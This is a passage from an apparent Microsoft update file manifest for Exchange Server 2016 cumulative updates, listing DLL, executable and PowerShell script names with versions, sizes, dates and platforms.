12:50| x86 \nMicrosoft.exchange.wopiclient.dll| 15.1.2242.10| 77,200| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.1.2242.10| 17,296| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.1.2242.10| 29,072| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.1.2242.10| 505,224| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.1.2242.10| 14,736| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.1.2242.10| 36,744| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.1.2242.10| 66,448| 27-Apr-21| 12:49| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.1.2242.10| 19,336| 27-Apr-21| 12:49| x86 \nMicrosoft.filtering.dll| 15.1.2242.10| 113,016| 27-Apr-21| 12:50| x86 \nMicrosoft.filtering.exchange.dll| 15.1.2242.10| 57,208| 27-Apr-21| 12:50| x86 \nMicrosoft.filtering.interop.dll| 15.1.2242.10| 15,240| 27-Apr-21| 12:49| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.1.2242.10| 46,984| 27-Apr-21| 12:50| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.1.2242.10| 15,736| 27-Apr-21| 12:50| x64 \nMicrosoft.forefront.filtering.common.dll| 15.1.2242.10| 23,952| 27-Apr-21| 12:50| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.1.2242.10| 22,400| 27-Apr-21| 12:49| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.1.2242.10| 34,696| 27-Apr-21| 12:50| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,914| 27-Apr-21| 12:50| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,290| 27-Apr-21| 12:50| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.1.2242.10| 1,517,944| 27-Apr-21| 12:50| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.1.2242.10| 13,192| 27-Apr-21| 12:50| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.1.2242.10| 33,168| 27-Apr-21| 12:50| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.1.2242.10| 18,312| 27-Apr-21| 12:50| x86 \nMicrosoft.forefront.reporting.common.dll| 15.1.2242.10| 46,456| 27-Apr-21| 12:50| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.1.2242.10| 50,576| 27-Apr-21| 12:50| x86 \nMicrosoft.isam.esent.collections.dll| 15.1.2242.10| 72,584| 27-Apr-21| 12:50| x86 \nMicrosoft.isam.esent.interop.dll| 15.1.2242.10| 533,904| 27-Apr-21| 12:50| x86 \nMicrosoft.managementgui.dll| 15.1.2242.10| 133,512| 27-Apr-21| 12:50| x86 \nMicrosoft.mce.interop.dll| 15.1.2242.10| 24,456| 27-Apr-21| 12:50| x86 \nMicrosoft.office.audit.dll| 15.1.2242.10| 123,768| 27-Apr-21| 12:49| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.1.2242.10| 593,296| 27-Apr-21| 12:49| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.1.2242.10| 42,376| 27-Apr-21| 12:49| x86 \nMicrosoft.office.compliance.console.core.dll| 15.1.2242.10| 218,000| 27-Apr-21| 12:50| x86 \nMicrosoft.office.compliance.console.dll| 15.1.2242.10| 854,928| 27-Apr-21| 12:48| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.1.2242.10| 485,760| 27-Apr-21| 12:50| x86 \nMicrosoft.office.compliance.core.dll| 15.1.2242.10| 413,048| 27-Apr-21| 12:49| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.1.2242.10| 36,216| 27-Apr-21| 12:49| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.1.2242.10| 84,856| 27-Apr-21| 12:50| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.1.2242.10| 1,782,160| 27-Apr-21| 12:49| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.1.2242.10| 49,544| 27-Apr-21| 12:49| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.1.2242.10| 27,512| 27-Apr-21| 12:50| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.1.2242.10| 174,984| 27-Apr-21| 12:50| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.1.2242.10| 166,272| 27-Apr-21| 12:50| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.1.2242.10| 40,312| 27-Apr-21| 12:48| x86 \nMicrosoft.online.box.shell.dll| 15.1.2242.10| 46,456| 27-Apr-21| 12:48| x86 \nMicrosoft.powershell.hostingtools.dll| 15.1.2242.10| 67,984| 27-Apr-21| 12:48| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.1.2242.10| 67,984| 27-Apr-21| 12:48| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.1.2242.10| 120,184| 27-Apr-21| 12:50| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,106| 27-Apr-21| 12:50| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,048| 27-Apr-21| 12:50| Not applicable \nMovemailbox.ps1| Not applicable| 61,100| 27-Apr-21| 12:50| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,586| 27-Apr-21| 12:50| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,516| 27-Apr-21| 12:50| Not applicable \nMpgearparser.dll| 15.1.2242.10| 99,728| 27-Apr-21| 12:50| x64 \nMsclassificationadapter.dll| 15.1.2242.10| 248,696| 27-Apr-21| 12:49| x64 \nMsexchangecompliance.exe| 15.1.2242.10| 78,712| 27-Apr-21| 12:49| x86 \nMsexchangedagmgmt.exe| 15.1.2242.10| 25,480| 27-Apr-21| 12:50| x86 \nMsexchangedelivery.exe| 15.1.2242.10| 38,792| 27-Apr-21| 12:50| x86 \nMsexchangefrontendtransport.exe| 15.1.2242.10| 31,608| 27-Apr-21| 12:50| x86 \nMsexchangehmhost.exe| 15.1.2242.10| 27,016| 27-Apr-21| 12:50| x86 \nMsexchangehmrecovery.exe| 15.1.2242.10| 29,584| 27-Apr-21| 12:50| x86 \nMsexchangemailboxassistants.exe| 15.1.2242.10| 72,568| 27-Apr-21| 12:49| x86 \nMsexchangemailboxreplication.exe| 15.1.2242.10| 20,880| 27-Apr-21| 12:50| x86 \nMsexchangemigrationworkflow.exe| 15.1.2242.10| 68,984| 27-Apr-21| 12:50| x86 \nMsexchangerepl.exe| 15.1.2242.10| 71,048| 27-Apr-21| 12:50| x86 \nMsexchangesubmission.exe| 15.1.2242.10| 123,256| 27-Apr-21| 12:50| x86 \nMsexchangethrottling.exe| 15.1.2242.10| 39,816| 27-Apr-21| 12:50| x86 \nMsexchangetransport.exe| 15.1.2242.10| 74,120| 27-Apr-21| 12:50| x86 \nMsexchangetransportlogsearch.exe| 15.1.2242.10| 139,144| 27-Apr-21| 12:50| x86 \nMsexchangewatchdog.exe| 15.1.2242.10| 55,688| 27-Apr-21| 12:50| x64 \nMspatchlinterop.dll| 15.1.2242.10| 53,624| 27-Apr-21| 12:50| x64 \nNativehttpproxy.dll| 15.1.2242.10| 91,536| 27-Apr-21| 12:48| x64 \nNavigatorparser.dll| 15.1.2242.10| 636,816| 27-Apr-21| 12:50| x64 \nNego2nativeinterface.dll| 15.1.2242.10| 19,336| 27-Apr-21| 12:49| x64 \nNegotiateclientcertificatemodule.dll| 15.1.2242.10| 30,096| 27-Apr-21| 12:48| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 22,248| 27-Apr-21| 12:50| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,559| 27-Apr-21| 12:50| Not applicable \nNtspxgen.dll| 15.1.2242.10| 80,784| 27-Apr-21| 12:49| x64 \nOleconverter.exe| 15.1.2242.10| 173,968| 27-Apr-21| 12:50| x64 \nOutsideinmodule.dll| 15.1.2242.10| 87,952| 27-Apr-21| 12:50| x64 \nOwaauth.dll| 15.1.2242.10| 92,024| 27-Apr-21| 12:48| x64 \nOwasmime.msi| Not applicable| 716,800| 27-Apr-21| 12:50| Not applicable \nPerf_common_extrace.dll| 15.1.2242.10| 245,112| 27-Apr-21| 12:48| x64 \nPerf_exchmem.dll| 15.1.2242.10| 85,896| 27-Apr-21| 12:48| x64 \nPipeline2.dll| 15.1.2242.10| 1,454,456| 27-Apr-21| 12:50| x64 \nPowershell.rbachostingtools.dll_1bf4f3e363ef418781685d1a60da11c1| 15.1.2242.10| 41,352| 27-Apr-21| 12:50| Not applicable \nPreparemoverequesthosting.ps1| Not applicable| 70,975| 27-Apr-21| 12:50| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,213| 27-Apr-21| 12:50| Not applicable \nProductinfo.managed.dll| 15.1.2242.10| 27,024| 27-Apr-21| 12:49| x86 \nProxybinclientsstringsdll| 15.1.2242.10| 924,560| 27-Apr-21| 12:50| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,218| 27-Apr-21| 12:50| Not applicable \nQuietexe.exe| 15.1.2242.10| 14,728| 27-Apr-21| 12:50| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,604| 27-Apr-21| 12:50| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,639| 27-Apr-21| 12:50| Not applicable \nRemoteexchange.ps1| Not applicable| 23,585| 27-Apr-21| 12:50| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,668| 27-Apr-21| 12:50| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,002| 27-Apr-21| 12:50| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 14,996| 27-Apr-21| 12:50| Not applicable \nReplaycrimsonmsg.dll| 15.1.2242.10| 1,099,128| 27-Apr-21| 12:50| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,456| 27-Apr-21| 12:50| Not applicable \nResetcasservice.ps1| Not applicable| 21,691| 27-Apr-21| 12:50| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,101| 27-Apr-21| 12:50| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,125| 27-Apr-21| 12:50| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,190| 27-Apr-21| 12:50| Not applicable \nRightsmanagementwrapper.dll| 15.1.2242.10| 86,416| 27-Apr-21| 12:50| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,774| 27-Apr-21| 12:50| Not applicable \nRpcperf.dll| 15.1.2242.10| 23,416| 27-Apr-21| 12:50| x64 \nRpcproxyshim.dll| 15.1.2242.10| 39,312| 27-Apr-21| 12:50| x64 \nRulesauditmsg.dll| 15.1.2242.10| 12,680| 27-Apr-21| 12:50| x64 \nRwsperfcounters.xml| Not applicable| 23,040| 27-Apr-21| 12:50| Not applicable \nSafehtmlnativewrapper.dll| 15.1.2242.10| 34,704| 27-Apr-21| 12:50| x64 \nScanenginetest.exe| 15.1.2242.10| 956,280| 27-Apr-21| 12:49| x64 \nScanningprocess.exe| 15.1.2242.10| 738,696| 27-Apr-21| 12:49| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,792| 27-Apr-21| 12:50| Not applicable \nServicecontrol.ps1| Not applicable| 52,313| 27-Apr-21| 12:49| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,734| 27-Apr-21| 12:50| Not applicable \nSettingsadapter.dll| 15.1.2242.10| 115,600| 27-Apr-21| 12:48| x64 \nSetup.exe| 15.1.2242.10| 20,864| 27-Apr-21| 12:50| x86 \nSetupui.exe| 15.1.2242.10| 49,016| 27-Apr-21| 12:50| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,173| 27-Apr-21| 12:50| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,859| 27-Apr-21| 12:50| Not applicable \nStatisticsutil.dll| 15.1.2242.10| 142,200| 27-Apr-21| 12:49| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,117| 27-Apr-21| 12:50| Not applicable \nStoretsconstants.ps1| Not applicable| 15,814| 27-Apr-21| 12:50| Not applicable \nStoretslibrary.ps1| Not applicable| 28,023| 27-Apr-21| 12:50| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.1.2242.10| 28,536| 27-Apr-21| 12:50| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,911| 27-Apr-21| 12:50| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,957| 27-Apr-21| 12:50| Not applicable \nTextconversionmodule.dll| 15.1.2242.10| 86,392| 27-Apr-21| 12:50| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,739| 27-Apr-21| 12:50| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,433| 27-Apr-21| 12:50| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,041| 27-Apr-21| 12:50| Not applicable \nUmservice.exe| 15.1.2242.10| 100,216| 27-Apr-21| 12:50| x86 \nUmworkerprocess.exe| 15.1.2242.10| 38,280| 27-Apr-21| 12:50| x86 \nUninstall_antispamagents.ps1| Not applicable| 15,457| 27-Apr-21| 12:50| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,014| 27-Apr-21| 12:50| Not applicable \nUpdatecas.ps1| Not applicable| 32,928| 27-Apr-21| 12:50| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,726| 27-Apr-21| 12:50| Not applicable \nUpdateserver.exe| 15.1.2242.10| 3,014,536| 27-Apr-21| 12:49| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,140| 27-Apr-21| 12:50| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 31,816| 27-Apr-21| 12:48| Not applicable \nWsbexchange.exe| 15.1.2242.10| 125,328| 27-Apr-21| 12:50| x64 \nX400prox.dll| 15.1.2242.10| 103,296| 27-Apr-21| 12:49| x64 \n_search.lingoperators.a| 15.1.2242.10| 34,696| 27-Apr-21| 12:50| Not applicable \n_search.lingoperators.b| 15.1.2242.10| 34,696| 27-Apr-21| 12:50| Not applicable \n_search.mailboxoperators.a| 15.1.2242.10| 289,160| 27-Apr-21| 12:48| Not applicable \n_search.mailboxoperators.b| 15.1.2242.10| 289,160| 27-Apr-21| 12:48| Not applicable \n_search.operatorschema.a| 15.1.2242.10| 483,208| 27-Apr-21| 12:48| Not applicable \n_search.operatorschema.b| 15.1.2242.10| 483,208| 27-Apr-21| 12:48| Not applicable \n_search.tokenoperators.a| 15.1.2242.10| 106,872| 27-Apr-21| 12:49| Not applicable \n_search.tokenoperators.b| 15.1.2242.10| 106,872| 27-Apr-21| 12:49| Not applicable \n_search.transportoperators.a| 15.1.2242.10| 64,904| 27-Apr-21| 12:50| Not applicable \n_search.transportoperators.b| 15.1.2242.10| 64,904| 27-Apr-21| 12:50| Not applicable \n \n### \n\n__\n\nMicrosoft Exchange Server 2016 Cumulative Update 19\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nFile name| File version| File size| Date| Time| Platform \nActivemonitoringeventmsg.dll| 15.1.2176.14| 71,048| 27-Apr-21| 14:39| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,518| 27-Apr-21| 14:40| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,941| 27-Apr-21| 14:42| Not applicable \nAdemodule.dll| 15.1.2176.14| 106,376| 27-Apr-21| 14:42| x64 \nAirfilter.dll| 15.1.2176.14| 42,872| 27-Apr-21| 14:41| x64 \nAjaxcontroltoolkit.dll| 15.1.2176.14| 92,552| 27-Apr-21| 14:39| x86 \nAntispamcommon.ps1| Not applicable| 13,481| 27-Apr-21| 14:42| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 27-Apr-21| 14:41| Not applicable \nAsentirs.msi| Not applicable| 77,824| 27-Apr-21| 14:40| Not applicable \nAsentsig.msi| Not applicable| 73,728| 27-Apr-21| 14:41| Not applicable \nBigfunnel.bondtypes.dll| 15.1.2176.14| 43,896| 27-Apr-21| 14:41| x86 \nBigfunnel.common.dll| 15.1.2176.14| 63,864| 27-Apr-21| 14:40| x86 \nBigfunnel.configuration.dll| 15.1.2176.14| 99,216| 27-Apr-21| 14:40| x86 \nBigfunnel.entropy.dll| 15.1.2176.14| 44,432| 27-Apr-21| 14:40| x86 \nBigfunnel.filter.dll| 15.1.2176.14| 54,136| 27-Apr-21| 14:40| x86 \nBigfunnel.indexstream.dll| 15.1.2176.14| 54,136| 27-Apr-21| 14:41| x86 \nBigfunnel.poi.dll| 15.1.2176.14| 203,640| 27-Apr-21| 14:40| x86 \nBigfunnel.postinglist.dll| 15.1.2176.14| 122,240| 27-Apr-21| 14:41| x86 \nBigfunnel.query.dll| 15.1.2176.14| 99,704| 27-Apr-21| 14:40| x86 \nBigfunnel.ranking.dll| 15.1.2176.14| 79,240| 27-Apr-21| 14:41| x86 \nBigfunnel.syntheticdatalib.dll| 15.1.2176.14| 3,634,568| 27-Apr-21| 14:40| x86 \nBigfunnel.wordbreakers.dll| 15.1.2176.14| 46,472| 27-Apr-21| 14:40| x86 \nCafe_airfilter_dll| 15.1.2176.14| 42,872| 27-Apr-21| 14:41| x64 \nCafe_exppw_dll| 15.1.2176.14| 83,320| 27-Apr-21| 14:41| x64 \nCafe_owaauth_dll| 15.1.2176.14| 92,048| 27-Apr-21| 14:39| x64 \nCalcalculation.ps1| Not applicable| 42,109| 27-Apr-21| 14:41| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,630| 27-Apr-21| 14:40| Not applicable \nChksgfiles.dll| 15.1.2176.14| 57,224| 27-Apr-21| 14:41| x64 \nCitsconstants.ps1| Not applicable| 15,801| 27-Apr-21| 14:39| Not applicable \nCitslibrary.ps1| Not applicable| 82,696| 27-Apr-21| 14:39| Not applicable \nCitstypes.ps1| Not applicable| 14,460| 27-Apr-21| 14:39| Not applicable \nClassificationengine_mce| 15.1.2176.14| 1,693,064| 27-Apr-21| 14:40| Not applicable \nClusmsg.dll| 15.1.2176.14| 134,032| 27-Apr-21| 14:41| x64 \nCoconet.dll| 15.1.2176.14| 47,992| 27-Apr-21| 14:40| x64 \nCollectovermetrics.ps1| Not applicable| 81,676| 27-Apr-21| 14:39| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,894| 27-Apr-21| 14:39| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,943| 27-Apr-21| 14:40| Not applicable \nComplianceauditservice.exe| 15.1.2176.14| 39,808| 27-Apr-21| 14:40| x86 \nConfigureadam.ps1| Not applicable| 22,756| 27-Apr-21| 14:41| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,320| 27-Apr-21| 14:42| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,782| 27-Apr-21| 14:42| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,820| 27-Apr-21| 14:42| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,279| 27-Apr-21| 14:42| Not applicable \nConnectfunctions.ps1| Not applicable| 37,137| 27-Apr-21| 14:40| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,432| 27-Apr-21| 14:40| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,224| 27-Apr-21| 14:42| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,045| 27-Apr-21| 14:42| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,544| 27-Apr-21| 14:41| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,777| 27-Apr-21| 14:41| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,904| 27-Apr-21| 14:42| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 27-Apr-21| 11:08| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 27-Apr-21| 11:08| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 27-Apr-21| 11:08| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 27-Apr-21| 11:08| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 27-Apr-21| 11:08| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 27-Apr-21| 11:08| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 27-Apr-21| 11:08| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 27-Apr-21| 11:08| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 27-Apr-21| 11:08| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 27-Apr-21| 11:08| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 27-Apr-21| 11:08| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 27-Apr-21| 11:08| Not applicable \nCts_exsmime.dll| 15.1.2176.14| 380,792| 27-Apr-21| 14:40| x64 \nCts_microsoft.exchange.data.common.dll| 15.1.2176.14| 1,686,920| 27-Apr-21| 14:40| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 27-Apr-21| 11:08| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.1.2176.14| 13,176| 27-Apr-21| 14:40| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.1.2176.14| 13,200| 27-Apr-21| 14:39| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.1.2176.14| 13,176| 27-Apr-21| 14:39| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.1.2176.14| 13,200| 27-Apr-21| 14:39| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.1.2176.14| 13,192| 27-Apr-21| 14:39| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.1.2176.14| 13,176| 27-Apr-21| 14:41| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.1.2176.14| 13,192| 27-Apr-21| 14:41| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.1.2176.14| 13,200| 27-Apr-21| 14:40| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.1.2176.14| 13,176| 27-Apr-21| 14:39| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.1.2176.14| 12,680| 27-Apr-21| 14:39| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.1.2176.14| 12,664| 27-Apr-21| 14:40| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.1.2176.14| 12,680| 27-Apr-21| 14:39| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.1.2176.14| 12,672| 27-Apr-21| 14:39| x86 \nDagcommonlibrary.ps1| Not applicable| 60,258| 27-Apr-21| 14:40| Not applicable \nDependentassemblygenerator.exe| 15.1.2176.14| 22,416| 27-Apr-21| 14:40| x86 \nDiaghelper.dll| 15.1.2176.14| 66,960| 27-Apr-21| 14:41| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,330| 27-Apr-21| 14:39| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,358| 27-Apr-21| 14:42| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,185| 27-Apr-21| 14:42| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,666| 27-Apr-21| 14:42| Not applicable \nDisklockerapi.dll| Not applicable| 22,408| 27-Apr-21| 14:41| x64 \nDlmigrationmodule.psm1| Not applicable| 39,592| 27-Apr-21| 14:41| Not applicable \nDsaccessperf.dll| 15.1.2176.14| 45,960| 27-Apr-21| 14:40| x64 \nDscperf.dll| 15.1.2176.14| 32,648| 27-Apr-21| 14:41| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.1.2176.14| 1,686,920| 27-Apr-21| 14:40| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.1.2176.14| 601,488| 27-Apr-21| 14:39| x86 \nEcpperfcounters.xml| Not applicable| 31,160| 27-Apr-21| 14:39| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 27-Apr-21| 11:10| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.1.2176.14| 13,200| 27-Apr-21| 14:41| x86 \nEdgetransport.exe| 15.1.2176.14| 49,528| 27-Apr-21| 14:40| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 27-Apr-21| 11:10| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 27-Apr-21| 11:10| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 27-Apr-21| 11:10| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 27-Apr-21| 11:10| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 27-Apr-21| 11:10| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 27-Apr-21| 11:10| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 27-Apr-21| 11:10| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 27-Apr-21| 11:10| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 27-Apr-21| 11:10| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 27-Apr-21| 11:10| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 27-Apr-21| 11:10| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 27-Apr-21| 11:10| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.1.2176.14| 13,200| 27-Apr-21| 14:41| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.1.2176.14| 13,200| 27-Apr-21| 14:41| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.1.2176.14| 13,184| 27-Apr-21| 14:41| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.1.2176.14| 13,176| 27-Apr-21| 14:40| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.1.2176.14| 13,200| 27-Apr-21| 14:40| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.1.2176.14| 13,192| 27-Apr-21| 14:40| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.1.2176.14| 13,184| 27-Apr-21| 14:41| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.1.2176.14| 13,176| 27-Apr-21| 14:40| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.1.2176.14| 13,192| 27-Apr-21| 14:40| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.1.2176.14| 13,200| 27-Apr-21| 14:41| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.1.2176.14| 13,176| 27-Apr-21| 14:40| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.1.2176.14| 13,200| 27-Apr-21| 14:41| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,360| 27-Apr-21| 14:42| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,559| 27-Apr-21| 14:42| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,584| 27-Apr-21| 14:42| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,610| 27-Apr-21| 14:42| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,908| 27-Apr-21| 14:42| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,643| 27-Apr-21| 14:42| Not applicable \nEngineupdateserviceinterfaces.dll| 15.1.2176.14| 17,784| 27-Apr-21| 14:41| x86 \nEscprint.dll| 15.1.2176.14| 20,360| 27-Apr-21| 14:39| x64 \nEse.dll| 15.1.2176.14| 3,695,496| 27-Apr-21| 14:40| x64 \nEseback2.dll| 15.1.2176.14| 325,000| 27-Apr-21| 14:40| x64 \nEsebcli2.dll| 15.1.2176.14| 292,728| 27-Apr-21| 14:40| x64 \nEseperf.dll| 15.1.2176.14| 116,104| 27-Apr-21| 14:40| x64 \nEseutil.exe| 15.1.2176.14| 398,728| 27-Apr-21| 14:40| x64 \nEsevss.dll| 15.1.2176.14| 44,424| 27-Apr-21| 14:40| x64 \nEtweseproviderresources.dll| 15.1.2176.14| 82,296| 27-Apr-21| 14:40| x64 \nEventperf.dll| 15.1.2176.14| 59,792| 27-Apr-21| 14:40| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,132| 27-Apr-21| 14:41| Not applicable \nExchange.format.ps1xml| Not applicable| 648,620| 27-Apr-21| 14:41| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 43,334| 27-Apr-21| 14:40| 